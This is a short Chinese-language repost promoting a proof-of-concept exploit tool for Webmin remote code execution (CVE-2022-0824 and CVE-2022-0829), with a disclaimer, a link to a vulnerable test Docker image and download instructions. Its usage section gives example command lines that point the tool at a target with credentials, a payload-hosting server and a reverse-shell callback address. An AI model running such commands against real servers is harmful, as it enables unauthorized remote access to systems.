WebminRCE 漏洞利用(CVE-2022-0824、CVE-2022-0829)
2022-11-10 08:5:18 Author: Web安全工具库(查看原文) 阅读量:26 收藏

===================================

免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。

0x01 工具介绍

CVE-2022-0824、CVE-2022-0829 - 文件管理器特权利用

可以在此处找到用于测试此 PoC 的易受攻击的应用程序作为 docker 映像。

https://hub.docker.com/r/gokul2/cve-2022-0824

0x02 安装与使用

使用方法

python3 cve-2022-0824.py --help$ python3 cve-2022-0824.py --host [Target_url] --user [Username] --password[Password] --Python_server [Filehosting Server Information] ----callback_url [<ip>:<port> for reverse shell connections] --proxy [Proxy server details - optional]$ python3 cve-2022-0824.py --host http://localhost:10000 --user usr --password usr --Python_server 192.168.43.228:9999 --callback_url 192.168.43.228:1234 --proxy http://127.0.0.1:8080

0x03 项目链接下载

1、通过阅读原文,到项目地址下载

2、关注公众号"web安全工具库",后台回复:20221110


文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247505773&idx=4&sn=f569fe94821f5d04735bf00be604451a&chksm=ebb5386edcc2b1784254eb69024288acafa1cf8cf352371425f49874edeb7ffdd1dd691e9135#rd
如有侵权请联系:admin#unsafe.sh